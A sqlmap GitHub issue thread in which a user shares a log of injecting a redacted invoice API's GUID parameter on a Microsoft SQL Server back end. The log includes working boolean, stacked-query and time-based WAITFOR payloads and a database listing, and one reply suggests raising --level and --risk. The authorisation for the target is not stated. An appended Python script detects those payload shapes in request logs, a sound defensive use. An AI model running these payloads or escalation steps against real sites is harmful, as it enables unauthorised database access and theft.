sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Cannot retrieve any table information #5546

Closed jvgassel closed 10 months ago

jvgassel commented 10 months ago

Using the command: python sqlmap.py -u https://www.xxxx.nl/api/invoices/invoice.php?GUID=xxx --batch --parse-errors -dbs --time-sec=10 --no-cast -D 1 --tables -t traffic.txt

I get this output

[19:55:20] [INFO] GET parameter 'GUID' appears to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
[19:55:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[19:55:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF - comment)'
[19:55:40] [INFO] GET parameter 'GUID' appears to be 'Microsoft SQL Server/Sybase time-based blind (IF - comment)' injectable
[19:55:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:55:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:55:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:55:41] [INFO] target URL appears to have 49 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[19:57:30] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[19:57:32] [INFO] checking if the injection point on GET parameter 'GUID' is a false positive
GET parameter 'GUID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 463 HTTP(s) requests:

Parameter: GUID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: GUID=xxx' AND 5082=5082 AND 'JxCS'='JxCS

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: GUID=xxx';WAITFOR DELAY '0:0:10'--

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: GUID=xxx' WAITFOR DELAY '0:0:10'--

[19:57:32] [INFO] testing Microsoft SQL Server
[19:57:32] [INFO] confirming Microsoft SQL Server
[19:57:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: Microsoft IIS 8.5, PHP 7.3.17
back-end DBMS: Microsoft SQL Server 2012
[19:57:33] [INFO] fetching database names
[19:57:33] [INFO] fetching number of databases
[19:57:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:57:33] [INFO] retrieved: 10
[19:57:34] [INFO] retrieved: model
[19:57:38] [INFO] retrieved: msdb
[19:57:41] [INFO] retrieved: 1
[19:57:49] [INFO] retrieved: 2
[19:58:03] [INFO] retrieved: 3
[19:58:22] [INFO] retrieved: 4
[19:58:35] [INFO] retrieved: tempdb
[19:58:39] [INFO] retrieved: transferPROD
[19:58:49] [INFO] retrieved: transferSTAGING
[19:58:59] [INFO] retrieved:
[19:58:59] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[19:59:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

available databases [9]:
[*] model
[*] msdb
[*] 1
[*] 2
[*] 3
[*] 4
[*] tempdb
[*] transferPROD
[*] transferSTAGING

[19:59:03] [INFO] fetching tables for database: 1
[19:59:03] [INFO] fetching number of tables for database '1'
[19:59:03] [INFO] retrieved: 90
[19:59:05] [INFO] retrieved:
[19:59:05] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)

[19:59:08] [INFO] retrieved:
[...]
[20:00:02] [INFO] retrieved:
Database: 1
[1 table]
+------+
| \x02 |
+------+

For none of the databases it can retrieve any tables. Sometimes I get
[19:54:14] [INFO] resumed: \x02
or
[19:54:16] [INFO] resumed: A!
or
[19:51:43] [INFO] resumed: !

Looking for command parameters to get this working, any help appreciated

ghost3666 commented 10 months ago

python sqlmap.py -u https://www.xxxx.nl/api/invoices/invoice.php?GUID=xxx --batch --parse-errors -dbs --time-sec=10 --no-cast -D 1 --tables -t traffic.txt --level=3 --risk=3

you can use SQLMap's --dbs option to retrieve a list of available databases
try this one
update sqlmap
check privileges
check which payload you are using is specific for the job or not

stamparm commented 10 months ago

could be that there are permission issues or those databases. how to properly address this issue with 0 useful information from your side? do a proper debugging and come back later
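
For whoever operates an endpoint like the one in this report: all three payloads sqlmap lists only work because the GUID parameter accepts characters outside a GUID. The following is an added example (not part of the thread and not sqlmap code) that triages request URLs by validating the parameter strictly and labelling the payload shapes shown in the report; the host `app.example`, the sample GUID, and the assumption that the parameter should hold a canonical 8-4-4-4-12 GUID are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the parameter must be a canonical 8-4-4-4-12 hex GUID, nothing else.
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Signatures for the three payload shapes in the sqlmap report above.
SIGNATURES = [
    ("stacked-query", re.compile(r";\s*WAITFOR\s+DELAY", re.I)),
    ("time-delay", re.compile(r"WAITFOR\s+DELAY\s+'\d+:\d+:\d+'", re.I)),
    ("boolean-tautology", re.compile(r"\bAND\s+(\d+)=\1\b", re.I)),
]

def classify_guid(value):
    """Return [] for a well-formed GUID, else labels explaining the rejection."""
    if GUID_RE.fullmatch(value):
        return []
    hits = [name for name, rx in SIGNATURES if rx.search(value)]
    return hits or ["malformed-guid"]

def triage(request_urls):
    """Map each URL whose GUID parameter is not a clean GUID to its labels."""
    findings = {}
    for url in request_urls:
        query = parse_qs(urlsplit(url).query, keep_blank_values=True)
        for value in query.get("GUID", []):  # parse_qs percent-decodes the value
            labels = classify_guid(value)
            if labels:
                findings[url] = labels
    return findings

# Constructed sample requests (hypothetical host and GUID; payload shapes from the report).
G = "3f2504e0-4f89-11d3-9a0c-0305e82c3301"
BASE = "https://app.example/api/invoices/invoice.php?GUID=" + G
SAMPLE = [
    BASE,
    BASE + "%27%20AND%205082%3D5082%20AND%20%27JxCS%27%3D%27JxCS",
    BASE + "%27%3BWAITFOR%20DELAY%20%270%3A0%3A10%27--",
    BASE + "%27%20WAITFOR%20DELAY%20%270%3A0%3A10%27--",
    "https://app.example/api/invoices/invoice.php?GUID=not-a-guid",
]

if __name__ == "__main__":
    for url, labels in triage(SAMPLE).items():
        print(labels, url)
```

The strict format check is the control; the signature labels only help sort rejected requests during log review, and the query itself should still bind the value as a parameter.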